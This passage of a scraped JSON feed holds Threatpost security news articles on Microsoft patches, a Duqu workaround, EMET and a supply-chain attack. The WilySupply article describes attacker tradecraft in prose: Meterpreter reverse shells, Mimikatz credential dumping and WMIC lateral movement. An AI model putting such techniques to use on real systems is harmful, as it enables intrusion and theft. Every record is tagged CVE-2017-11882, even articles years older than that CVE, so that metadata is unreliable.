[iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\nImage via [adamshostack](<http://www.flickr.com/photos/adamshostack/7308776486/in/photolist-c8RoBG/lightbox/>)\u2018s Flickr photostream, Creative Commons\n", "cvss3": {}, "published": "2011-12-12T15:12:45", "type": "threatpost", "title": "Adam Shostack on Methods of Compromise, the New School and Learning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:46:17", "id": "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "href": 
"https://threatpost.com/adam-shostack-methods-compromise-new-school-and-learning-121211/75984/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "description": "[](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November patch Tuesday release. 
The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. 
However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "cvss3": {}, "published": "2011-11-04T11:47:32", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:25", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:18", "description": "[From CIO (Robert McMillan)](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>)\n\n[](<https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/>)Corporate IT staffers will get a double whammy next week, as both [Microsoft and Oracle are set to release critical security updates](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>) [cio.com] on the same day, including a likely fix for an Excel bug that has been used by cybercriminals.\n\nThis month, Oracle\u2019s quarterly software fixes and Microsoft\u2019s monthly patches happen to fall on the same day, next Tuesday. For Windows users, there will be a lot to patch. Microsoft plans to release [eight updates in total](<http://www.microsoft.com/technet/security/bulletin/ms09-apr.mspx>) [microsoft.com]: Five of them are for Windows, with a single update each for Internet Explorer, Excel and Microsoft\u2019s Internet Security and Acceleration (ISA) server. 
[Read the full story](<http://www.cio.com/article/488842/After_Attacks_Excel_Update_Due_From_Microsoft>). More from [ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3116>) [zdnet.com]\n", "cvss3": {}, "published": "2009-04-09T20:27:27", "type": "threatpost", "title": "After attacks, Microsoft readies security patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:26", "id": "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "href": "https://threatpost.com/after-attacks-microsoft-readies-security-patches-040909/72521/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. 
The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA), giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and, using Outside In, processes the message on Exchange, exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit, avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for the faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. 
\u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. 
[Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "[](<https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/>)Microsoft on Friday said that a weakness in Internet Explorer 8 identified by security researcher Ruben Santamarta recently is not an exploitable vulnerability, but rather a \u201ctechnique for bypassing ASLR.\u201d\n\nASLR (Address Space Layout Randomization) is a memory protection that, along with DEP (Data Execution Prevention), Microsoft has added to recent versions of Windows and Internet Explorer in order to prevent some specific memory-based attacks. Security researchers and software security experts have praised the two technologies as being very effective anti-exploit technologies and have said ASLR and DEP together make it much more difficult to take advantage of memory vulnerabilities on Windows machines.\n\nHowever, the two technologies certainly are not a foolproof defense against attacks. 
Several researchers have demonstrated various techniques for bypassing ASLR and DEP under certain circumstances, although Microsoft has addressed some of those attacks in recent releases of Internet Explorer.\n\nSantamarta, a researcher at Wintercore, a Spanish security company, recently published information on a [flaw he found in mshtml.dll](<https://threatpost.com/flaw-core-ie-8-component-could-enable-remote-attacks-070610/>), the HTML viewer in IE 8. He said in [his advisory](<http://reversemode.com/index.php?option=com_content&task=view&id=68&Itemid=1>) that the problem could be exploited to leak a memory pointer in IE 8, which, when combined with some other data, could allow an attacker to run code on a remote machine.\n\nHowever, Jerry Bryant of Microsoft\u2019s Security Response Center said that the problem is not an exploitable vulnerability.\n\n\u201cThe Internet Explorer reverse mode issue targeting mshtml.dll is not an exploitable vulnerability. It is a technique to bypass ASLR (Address Space Layout Randomization) under certain conditions. ASLR is an important countermeasure introduced to help protect customers from memory-targeting attacks that are commonly seen in the wild. The mitigation is most effectively deployed in tandem with DEP (Data Execution Prevention),\u201d he said. 
\u201cThese two mitigations, though not capable of blocking all attacks, are highly effective when used in combination with one another.\u201d \n", "cvss3": {}, "published": "2010-07-09T18:34:43", "type": "threatpost", "title": "Microsoft Says IE8 Weakness Not an Exploitable Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:26:00", "id": "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "href": "https://threatpost.com/microsoft-says-ie8-weakness-not-exploitable-flaw-070910/74195/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "Prompted by the disclosure of a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-working-on-patch-for-ie-8-zero-day/106247>) more than six months after it was reported, Microsoft next Tuesday will finally issue a patch.\n\nHP\u2019s Zero Day Initiative (ZDI) released on May 21 some detail on a previously unreported use-after-free bug in IE 8. No public exploits were reported and while Microsoft acknowledged receipt of the vulnerability report from ZDI, it had not produced a patch prior to ZDI\u2019s disclosure per its guidelines.\n\nThe vulnerability affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cSome fixes are more complex than others, and we must test every one against a huge number of programs, applications and different configurations,\u201d a Microsoft spokesperson said. 
\u201cWe continue to encourage customers to upgrade to a modern operating system, such as Windows 7 or 8.1, and run the latest version of Internet Explorer which includes further protections.\u201d\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s [Patch Tuesday security updates.](<https://technet.microsoft.com/en-us/library/security/MS14-JUN>) There will be seven bulletins in all, five rated important by the company. The IE patch will likely be a cumulative rollup as it affects the browser all the way back to IE 6 on Windows Server 2003.\n\nThe second critical bulletin is also a remote code execution vulnerability, this one in Microsoft Office and Microsoft Lync, the company\u2019s messaging and video conferencing application. The vulnerability is rated critical for Lync 2013 and 2010, as well as Live Meeting 2007 Console; it is rated important for Microsoft Office 2010 and Office 2007.\n\n\u201cGiven that the second bulletin will affect Lync Server and the older Live Meeting Console this may be a truly remotely exploitable vulnerability,\u201d said Ross Barrett, senior manager of security engineering at Rapid7.\n\nWindows Server 2003, it should be noted, has nearly entered its last year of support; it\u2019s scheduled to go end-of-life in July 2015.\n\n\u201cWe are coming up on just a year out now and because any changes to your server will likely be a significant amount of work, it isn\u2019t too soon to get started on that plan,\u201d said Russ Ernst, director, product management, Lumension.\n\nThe remaining bulletins, all rated important, include a remote code execution bug in Office, separate information disclosure vulnerabilities in Windows and Lync Server, a denial-of-service vulnerability in Windows, and a tampering vulnerability in Windows.\n\n\u201cThe tampering label on the seventh bulletin may 
suggest it allows a message to be altered in transit,\u201d Barrett said. \u201cProbably a limited scenario for exploitation.\u201d\n", "cvss3": {}, "published": "2014-06-05T14:30:33", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-10T18:53:57", "id": "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "href": "https://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:24", "description": "The latest version of Microsoft\u2019s freely available stopgap against zero-day exploits was released today with two new exploit mitigations and a batch of new configuration options.\n\nThe update to Microsoft\u2019s Enhanced Mitigation Experience Tool kit, or EMET, comes six months after a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) was released in February during the RSA Conference. It was then when Microsoft was touting new plug-in controls and memory protections, both of which have been rolled into [EMET 5.0](<http://blogs.technet.com/b/msrc/archive/2014/07/30/general-availability-for-enhanced-mitigation-experience-toolkit-emet-5-0.aspx>).\n\nThe first new mitigation is called Attack Surface Reduction (ASR). The mitigation allows Windows administrators to determine when\u2014or if\u2014plug-ins such as Java or Adobe Flash run at all on a Windows computer. Java and Flash, for example, have been favorite targets of hackers. 
Many advanced attacks exploit vulnerabilities in either platform, giving them an initial foothold on a system that can be then leveraged for further system and network access.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet. They can also block Office applications, for example, from loading Flash in a Word or Excel document, but allow it in the browser.\n\n\u201cWe heard from customers that they wanted more control over which programs and in which scenarios these plugins can be loaded. We initially released a Fix It tool last year to disable the Java plugin entirely in Internet Explorer and that helped people,\u201d said Jonathan Ness, principal security development manager for the Microsoft Security Response Center. \u201cBut customers told us that they still needed Java for their line-of-business applications running on their local intranet and were looking for a way to block Java and other plugins from loading on the wider untrusted Internet.\u201d\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming (ROP) exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. 
EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe other new mitigation in EMET 5.0 is called Export Address Table Filtering Plus (EAF+), which introduces two new methods aimed at disrupting advanced attacks, Microsoft said.\n\n\u201cFor example, EAF+ adds a new \u2018page guard\u2019 protection to help prevent memory read operations, commonly used as information leaks to build exploitations,\u201d Microsoft said in a statement.\n\n\u201cIt\u2019s the way EMET blocks common exploit techniques, common shell code techniques. The engineers building EMET are the same engineers in the security response center that respond to attacks in the wild against our software and these guys are always studying new attack techniques that show up in real-world exploits,\u201d Ness said. \u201cEAF+ amplifies the scope and robustness of EAF. It blocks new kinds of exploit techniques by performing additional integrity checks and preventing certain memory read operations used as \u2018read anywhere\u2019 primitives in recent exploits.\u201d\n\nMicrosoft has also tweaked the configuration options in EMET 5.0 allowing admins to further configure how mitigations protect applications in a particular IT environment.\n\n\u201cUsers can configure which specific memory addresses to protect with the HeapSpray Allocation mitigation using EMET 5.0,\u201d Microsoft said. \u201cWe continue to provide smart defaults for many of the most common applications used by our customers.\u201d\n\nMicrosoft said it has also simplified the way EMET configuration changes can be pushed via Group Policy in Active Directory.\n\n\u201cThey will no longer need to refresh the EMET configuration on each host or wait for an application refresh to make configuration changes to all hosts via group policy,\u201d Ness said. 
\u201cConfiguration changes will take effect right away with the addition of the EMET Service.\u201d\n\nMicrosoft has also added new services that help users monitor logs for suspicious activity, and has added improvements to its Certificate Trust feature where users are able to establish settings that block users from visiting websites with untrusted digital certificates.\n\n\u201cAll EMET users are going to benefit from the way we refactored many components of the EMET 5.0 engine to maximize application compatibility and reduce false positives, and from the work we did with popular anti-malware products to ensure application compatibility,\u201d Ness said.\n", "cvss3": {}, "published": "2014-07-31T14:41:35", "type": "threatpost", "title": "Microsoft Releases EMET 5.0 Exploit Mitigation Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-06T21:06:00", "id": "THREATPOST:985009AC9680D632153D78707A8949EF", "href": "https://threatpost.com/microsoft-releases-new-version-of-emet-exploit-mitigation-tool/107549/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "[From SearchSecurity (Robert Westervelt)](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>)\n\n[](<https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/>)Microsoft issued an advisory Monday, warning of a new vulnerability in [Office Web Components](<http://www.microsoft.com/technet/security/advisory/973472.mspx>) being actively targeted by attackers. The Office Web Components allow users to view spreadsheets, charts and databases on the Web. Microsoft said the vulnerability is in the Spreadsheet ActiveX Control, which is used by Internet Explorer (IE) to display the data in the browser. It is remotely exploitable when a person browses with IE and visits a malicious website. 
If successfully exploited, an attacker could gain the same user rights as the local user and gain complete control of a system, Microsoft said. [Read the full story](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>) [SearchSecurity].\n", "cvss3": {}, "published": "2009-07-13T18:53:30", "type": "threatpost", "title": "New Flaw in Microsoft Office Web Components Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:54", "id": "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "href": "https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/72911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:44", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. 
They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp Folder_ on one of the targeted systems revealed the legitimate third-party updater running as a service. However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. 
The victims were unaware that a malicious third party had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact that adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included: memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; migration into long-living processes, such as the Windows Printer Spooler or _spoolsv.exe_; use of common tools like Mimikatz and Kerberoast to dump hashes; lateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "cvss3": {}, "published": "2017-05-05T14:11:31", "type": "threatpost", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-05-05T18:11:31", "id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:39", "description": "Mark Dowd, fresh off his 
[2017 Security Analyst Summit keynote](<https://threatpost.com/memory-corruption-mitigations-doing-their-job/124728/>), discusses why certain exploit mitigations have been so successful in driving up the cost of exploit development for attackers.\n", "cvss3": {}, "published": "2017-05-26T12:00:08", "type": "threatpost", "title": "Mark Dowd on Exploit Mitigation Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-07-02T19:20:30", "id": "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "href": "https://threatpost.com/mark-dowd-on-exploit-mitigation-development/125947/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "Microsoft announced this afternoon that the zero-day vulnerability being exploited in a watering hole attack against an unnamed U.S.-based NGO website was already scheduled to be patched in a [cumulative Internet Explorer update](<http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx>) tomorrow.\n\nThe zero-day was reported publicly on Friday by FireEye researchers and today a few more dots were connected on the attack, which is dropping a variant of the McRAT Trojan that has been used in a number of [targeted espionage attacks](<http://threatpost.com/ie-zero-day-watering-hole-attack-injects-malicious-payload-into-memory/102891>) targeting industrial secrets.\n\nMicrosoft promised a relatively light [Patch Tuesday tomorrow](<http://threatpost.com/tiff-zero-day-missing-from-november-patch-tuesday-updates/102864>) that included another IE rollup, a staple of the company\u2019s monthly security updates in 2013. 
Dustin Childs, a group manager in the Microsoft Trustworthy Computing group, said today that the vulnerability in an IE ActiveX Control will be patched in MS13-90 tomorrow.\n\nIn its [advanced notification](<http://technet.microsoft.com/en-us/security/bulletin/ms13-nov>) released last Thursday, Microsoft said the IE bulletin is rated critical because it involves flaws that can lead to remote code execution. The critical rating applies to IE 6-8 on Windows XP, IE7-9 on Vista, IE 8-10 on Windows 7, and IE 10 on Windows 8 and 8.1; all other versions are rated important.\n\nFireEye, today told Threatpost, that the attack is limited to a single U.S.-based website hosting domestic and international policy guidance. No details were available on how the site was compromised, only that the victims were hit by malware in drive-by download attacks targeting an information leakage vulnerability and a memory corruption issue leading to remote code execution.\n\nWhat differentiates this attack from other watering hole attacks is that victims are not subject to malicious iframes or traffic-redirects to attacker-controlled sites and further malware downloads. Instead, McRAT is injected directly into memory, a new twist on advanced targeted attacks.\n\n\u201cBy using memory-only methods, the attack is exceptionally difficult for network defenders to detect, when trying to examine and confirm which endpoints are infected, using traditional disk-based forensics methods,\u201d said Darien Kindlund, FireEye director of threat intelligence.\n\nMicrosoft said a number of mitigations are available to IE users as a mitigation until a patch is applied, namely setting security zone settings to \u201cHigh\u201d to block ActiveX Controls and Active Scripting, though users could experience some usability issues. IE can also be configured to prompt a user before running Active Scripting. 
The Enhanced Mitigation Experience Toolkit (EMET) is also a viable mitigation, Microsoft said.\n\nThe IE patch is one of eight bulletins scheduled for tomorrow, three of those rated critical. The scheduled security updates, however, will not include a patch for the Windows TIFF zero-day being actively exploited in attacks primarily in Pakistan. The vulnerability in several Windows and Office versions is being exploited in [targeted attacks](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) against Windows XP systems running Office 2007. Microsoft released a [Fix-It](<https://support.microsoft.com/kb/2896666>) tool as a stopgap measure until a patch is released out of band or with the December security updates.\n", "cvss3": {}, "published": "2013-11-11T17:54:28", "type": "threatpost", "title": "IE Zero Day Patch Already in November Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-12T22:11:19", "id": "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "href": "https://threatpost.com/microsoft-ie-zero-day-patch-among-november-patch-tuesday-updates/102898/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a heads-up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. 
The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four other critical bulletins for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, which usually means that exploiting them would require user interaction or local access rather than an unauthenticated remote attack.\n", "cvss3": {}, "published": "2014-11-06T14:34:02", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-06T19:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:22", "description": "Microsoft is changing the way in which it handles vulnerability disclosures, now moving to a model it calls coordinated vulnerability disclosure, in which the researcher and the vendor work together to verify a vulnerability and allow ample time for a patch. 
